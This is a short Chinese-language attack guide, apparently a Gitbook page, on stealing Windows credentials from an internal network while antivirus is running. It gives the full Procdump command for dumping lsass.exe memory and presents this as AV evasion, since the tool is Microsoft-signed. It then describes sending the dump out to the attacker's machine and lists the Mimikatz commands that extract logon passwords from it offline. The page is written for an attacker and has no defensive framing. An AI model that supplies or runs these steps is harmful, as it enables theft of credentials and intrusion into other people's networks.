内网有杀软又怎么抓

1. 使用 Procdump 转储 lsass.exe 进程

Procdump 是微软 Sysinternals 工具集中的一个合法程序,它的主要功能是创建进程的内存转储文件(Memory Dump)。这个工具通常被系统管理员用来诊断程序崩溃

由于 Procdump 是一个合法的、微软签名的工具,很多杀毒软件默认将其视为可信程序,或者至少不会像对待 Mimikatz 那样立即拦截它对 lsass.exe 的访问

  • 命令: procdump64.exe -accepteula -ma lsass.exe lsass.dmp
  • 解释:
    • -accepteula:接受许可协议,避免交互式提示
    • -ma:指定转储整个内存
    • lsass.exe:目标进程
    • lsass.dmp:输出的转储文件名

执行这个命令后,它会创建一个包含 lsass.exe 进程内存数据的 lsass.dmp 文件,并将其保存在磁盘上。这一步的重点在于:没有使用任何恶意工具,只使用了系统管理员常用的合法工具

2. 将转储文件下载到攻击机

这一步需要你将 lsass.dmp 文件从目标服务器下载到你的本地攻击机。你可以使用多种方法,例如:

  • HTTP/HTTPS 文件传输: 在目标机器上通过 powershell 或其他工具,将文件上传到你搭建的 Web 服务器。
  • SMB/SFTP 传输: 如果网络环境允许,通过 SMB 共享或 SFTP 传输文件

这个过程可能会被杀毒软件或网络安全设备检测到,因此需要注意。但即使被检测到,也只是一个数据传输行为,而不是一个恶意代码执行行为

3. 使用 Mimikatz 离线读取转储文件

lsass.dmp 文件下载到你的攻击机后,你就可以在你的本地机器上运行 Mimikatz,并让它去分析这个转储文件,而不是去连接目标机器的 lsass.exe 进程

  • 命令:
    • mimikatz.exe
    • privilege::debug
    • sekurlsa::minidump lsass.dmp
    • sekurlsa::logonpasswords
  • 解释:
    • privilege::debug:获取调试权限,这是 Mimikatz 正常工作所必需的
    • sekurlsa::minidump lsass.dmp:指定 Mimikatz 从 lsass.dmp 文件而不是实时进程中读取数据
    • sekurlsa::logonpasswords:从加载的转储文件中提取登录凭据
Copyright © 版权信息 all right reserved,powered by Gitbook该文件修订时间: 2025-09-25 03:12:56

results matching ""

    No results matching ""